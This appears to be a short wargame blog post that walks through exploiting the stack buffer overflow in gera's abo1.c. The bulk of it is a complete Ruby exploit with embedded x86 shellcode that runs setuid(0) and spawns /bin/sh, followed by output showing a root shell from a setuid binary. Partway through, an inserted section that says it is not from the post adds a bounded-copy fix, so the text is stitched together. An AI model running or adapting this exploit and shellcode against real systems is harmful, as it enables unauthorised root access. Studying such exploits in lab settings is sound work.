Overflowed !!
While playing the vortex wargames, I found this nice article written by teleh0r@doglover.com, called Writing Bufferoverflow Exploit with Perl.
So ...
This small blog post will be a very short how-to on writing an exploit with Ruby.
I'm not planning to explain further what a buffer overflow is and how to exploit it.
If you wish to read more papers, there are some articles at BADC0DED and L0T3K.
I took the example from gera's Insecure Programming Example, from the Advanced Bufferoverflow section. File name: abo1.c
Here's their code:

```c
#include <string.h>

/* abo1.c from gera's Insecure Programming examples. The parameter names are
   swapped relative to the usual argc/argv, but it compiles as written. */
int main(int argv, char **argc) {
    char buf[256];
    strcpy(buf, argc[1]);   /* unbounded copy: no length check on argc[1] */
}
```
```shell
$ gcc -o abo1 abo1.c
$ ./abo1 `ruby -e 'print "A" * 268'`
Segmentation fault
```
From the code we can see that this piece of C code can only hold 256 characters; when we pass 268 A's, the copy runs past the buffer and the program crashes with a segmentation fault.
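An added example (not from this post, gera's code or teleh0r's article) of the fix for abo1.c: the same copy done with a length check, so an argument longer than the buffer is rejected instead of running past it. The names `copy_bounded`, `abo1_fixed` and `try_copy_as` are chosen here for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Buffer size used by abo1.c */
#define BUF_SIZE 256

/* Bounded replacement for the unchecked strcpy in abo1.c.
 * Copies src only if it fits (including the NUL) in dst_size bytes.
 * Returns 0 on success, -1 if src is too long: the input is rejected,
 * not silently truncated, and dst is left as an empty string. */
int copy_bounded(char *dst, size_t dst_size, const char *src)
{
    const char *nul;
    if (dst == NULL || src == NULL || dst_size == 0)
        return -1;
    nul = memchr(src, '\0', dst_size);  /* scan at most dst_size bytes */
    if (nul == NULL) {                  /* no terminator within the buffer: too long */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, (size_t)(nul - src) + 1);  /* includes the NUL */
    return 0;
}

/* Checked version of abo1's main: verifies argc before touching argv[1]. */
int abo1_fixed(int argc, char **argv)
{
    char buf[BUF_SIZE];
    if (argc < 2) {
        fputs("usage: abo1 <string>\n", stderr);
        return 1;
    }
    if (copy_bounded(buf, sizeof buf, argv[1]) != 0) {
        fprintf(stderr, "input too long (max %zu bytes)\n", sizeof buf - 1);
        return 2;
    }
    printf("copied %zu bytes\n", strlen(buf));
    return 0;
}

/* Demonstration helper: try to copy n 'A' bytes, like the 268-A test above. */
int try_copy_as(size_t n)
{
    char src[512];
    char dst[BUF_SIZE];
    if (n >= sizeof src)
        return -1;
    memset(src, 'A', n);
    src[n] = '\0';
    return copy_bounded(dst, sizeof dst, src);
}
```

With this check, `./abo1` followed by 268 A's exits with status 2 and an error message instead of a segmentation fault.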
```ruby
#!/usr/local/bin/ruby
# Ruby code by xWinGs
# Shellcode by OYXin
# File name: abo1-exp.rb
shellcode =
  "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" +
  "\x31\xdb\x89\xd8\xb0\x2e\xcd\x80" +
  "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69" +
  "\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"
path = "./abo1"
buffer = ("A" * 268)                 # fills buf[256] plus the bytes up to the saved return address
ret = (0xbffffffa - shellcode.length - path.length)   # guessed address of the shellcode in the environment
print "Shellcode : ", shellcode.length, "\n"
print "Path : ", path.length, "\n"
print "New ret : ", ret, "\n"
new_ret = [ret].pack('L')            # 32-bit unsigned, native byte order
buffer += new_ret
ENV['BadShell'] = "#{ENV['BadShell']}#{shellcode}"   # shellcode is passed in via the environment
system(path, buffer)
```
A few more steps to go:

```shell
root# chmod u+s abo1
$ ruby abo1-exp.rb
$ id
uid=1000(xwings) gid=1000(xwings) groups=1000(xwings)
$ ruby abo1-exp.rb
Shellcode : 40
Path : 6
New ret : 3221225420
# id
uid=0(root) gid=0(root) groups=1000(xwings)
```
It won't work under Ubuntu, right?